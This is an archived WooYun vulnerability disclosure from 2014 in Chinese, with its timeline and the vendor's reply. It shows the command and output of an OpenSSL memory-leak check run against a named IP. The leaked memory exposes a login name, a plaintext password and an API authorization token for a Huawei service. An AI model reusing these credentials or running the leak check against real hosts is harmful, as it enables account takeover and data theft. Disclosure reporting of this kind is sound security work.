乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2014-12-10: 细节已通知厂商并且等待厂商处理中 2014-12-10: 厂商已经确认,细节仅向厂商公开 2014-12-20: 细节向核心白帽子及相关领域专家公开 2014-12-30: 细节向普通白帽子公开 2015-01-09: 细节向实习白帽子公开 2015-01-24: 细节向公众公开
杀器发现
python openssl.py 119.145.14.47 443|more[{"type": 0, "description": "IP:119.145.14.47:443<br>\u5b58\u5728openssl \u4fe1\u606f\u6cc4\u9732\uff1a <br>\[email protected][...r....+..H...9........w.3....f.....\".!.9.8.........5.............................3.2.....E.D...../...A.................................I...........4.2...................................................#.......PF..G.. iPhone OS8.1..x-device-name: iPhone..x-device-type: ios..x-client-version: V2.2.0.210..Content-Length: 85....{. \"appId\" : \"espace\",. \"loginName\" : \"x00246451\",. \"password\" : \"whXF07!@\".}......$.0;i.......3m..............|\".i.8...pf,.C.....O.q+B.....b............................,Mp*v.a.......(&W.A..f..........ding: gzip, deflate.......*....?.lr....>N.i..}i.|..&..z...............4NU01...9.e.....CwK&o..Cq:)...J.....vln..;...\\..%.mu.F..#......az.F.....l...=([email protected][email protected]..'mcX*D.y..j.......g.x.. ....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.......8....<.
GET /api/v2/serverurl?type=ufm HTTP/1.1..Host: onebox.huawei.com..Accept: */*..Authorization:OneBox/07f75bdb7fae12829423283ffade15ef..Content-Type:application/json
危害等级:高
漏洞Rank:15
确认时间:2014-12-10 19:37
感谢白帽子关注。已通知立刻整改。
暂无